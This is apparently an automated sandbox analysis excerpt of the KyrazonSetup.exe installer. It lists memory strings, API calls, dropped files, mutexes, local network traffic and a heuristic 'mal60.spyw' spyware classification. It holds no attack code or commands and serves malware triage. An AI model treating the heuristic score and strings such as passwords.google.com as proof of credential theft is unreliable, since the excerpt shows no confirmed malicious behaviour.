Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/protobuf
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/re2
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ruy
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/securemessage
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/sentencepiece
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/shell-encryption
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ukey2
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/woff2
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/wuffs-mirror-release-c
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/xnnpack
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/wide-align
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/intel/libva
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/yallist.git
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jrmuizel/qcms/tree/v4
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/protocolbuffers/protobuf/blob/master/java/lite.md
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/puppeteer/puppeteer/tree/main/packages/puppeteer-core
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/simplejson/simplejson
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/broofa
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/ctavan
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/ljharb
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/sindresorhus
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/models
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tensorflow
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/text.git
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/tflite-support
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid#getrandomvalues-not-supported
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid.git
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid/pull/434
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/uuidjs/uuid/pull/677#issuecomment-1757351351
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/wasdk/wasmparser
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/xiph/rnnoise
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xdg/xdgmime
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/mozilla-central/file/tip/netwerk/base/nsURLParsers.cpp
Source: KyrazonSetup.exe, 00000000.00000003.1866953571.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/myactivity/?utm_source=chrome_nhttps://myactivity.google.com/myactivit
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://opensource.org/licenses/MIT
Source: KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867529465.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869435244.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.com
Source: KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comCompte
Source: KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868481609.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868008888.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867762159.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comGoogle
Source: KyrazonSetup.exe, 00000000.00000003.1869039215.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comKonta
Source: KyrazonSetup.exe, 00000000.00000003.1870919071.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passwords.google.comT
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://polymer-library.polymer-project.org
Source: KyrazonSetup.exe, 00000000.00000003.1869513927.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://primer.com.Uporaba
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quiche.googlesource.com/quiche
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com)
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/site/gaviotachessengine/Home/endgame-tablebases-1
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://skia.org/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://source.corp.google.com/piper///depot/google3/third_party/tamachiyomi/README.md
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sqlite.org/
Source: KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867607349.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867686588.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868196976.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867450366.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868578913.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870121124.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865618670.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866034713.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: KyrazonSetup.exe, 00000000.00000003.1868301732.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867607349.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867686588.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1866823126.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865378931.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868196976.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869169312.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868387309.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867236925.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870828493.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867926612.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868755608.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868835634.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867450366.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1868578913.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865202594.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1867341262.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1869852826.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1865836497.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870121124.000000000078C000.00000004.00000020.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1870648405.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: KyrazonSetup.exe, 00000000.00000003.1866565978.000000000078C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869?hl=es
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swiftshader.googlesource.com/SwiftShader
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc9562.html
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc9562.html#name-example-of-a-uuidv7-value
Source: KyrazonSetup.exe, 00000000.00000003.1871258931.0000000004FA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc9562.html#section-6.2-5.1
Source: KyrazonSetup.exe, 00000000.00000003.1863909793.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/copyright.html.
Source: unknownNetwork traffic detected: HTTP traffic on port 49542 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49546
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49545
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49544
Source: unknownNetwork traffic detected: HTTP traffic on port 49540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49542
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49541
Source: unknownNetwork traffic detected: HTTP traffic on port 49544 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49540
Source: unknownNetwork traffic detected: HTTP traffic on port 49546 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49552 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49535 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49550 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49537
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49535
Source: unknownNetwork traffic detected: HTTP traffic on port 49541 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49545 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49552
Source: unknownNetwork traffic detected: HTTP traffic on port 49537 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49551
Source: unknownNetwork traffic detected: HTTP traffic on port 49547 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49550
Source: unknownNetwork traffic detected: HTTP traffic on port 49551 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49548 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49549
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49548
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49547
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405205
Source: Conhost.exeProcess created: 51
Source: cmd.exeProcess created: 56

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile dump: KyrazonGodot.exe.0.dr 172671488Jump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile dump: KyrazonGodot.exe0.0.dr 172671488Jump to dropped file
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00404A440_2_00404A44
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00406F540_2_00406F54
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_0040677D0_2_0040677D
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeCode function: 12_2_0040100012_2_00401000
Source: C:\Users\user\Desktop\KyrazonSetup.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeCode function: String function: 004029C7 appears 72 times
Source: libEGL.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: KyrazonGodot.exe.0.drStatic PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: KyrazonGodot.exe0.0.drStatic PE information: Number of sections : 15 > 10
Source: KyrazonSetup.exe, 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamensis7z.dll, vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1871787934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameShortcut.exe8 vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1864822801.0000000004FA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevk_swiftshader.dll, vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1815847751.0000000004FA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameelectron.exe2 vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1861082432.000000000078C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibEGL.dllb! vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs KyrazonSetup.exe
Source: KyrazonSetup.exe, 00000000.00000003.1861726398.0000000004FA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dllb! vs KyrazonSetup.exe
Source: KyrazonSetup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal60.spyw.winEXE@294/101@10/8
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004044D1
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,0_2_004020D1
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Users\user\Desktop\KyrazonSetup.exeMutant created: \Sessions\1\BaseNamedObjects\b3cf5a4f-183c-5906-ad23-5f1f95ad8d0e
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:600:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsoC2CC.tmpJump to behavior
Source: KyrazonSetup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KYRAZONGODOT.EXE'
Source: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'KYRAZONGODOT.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
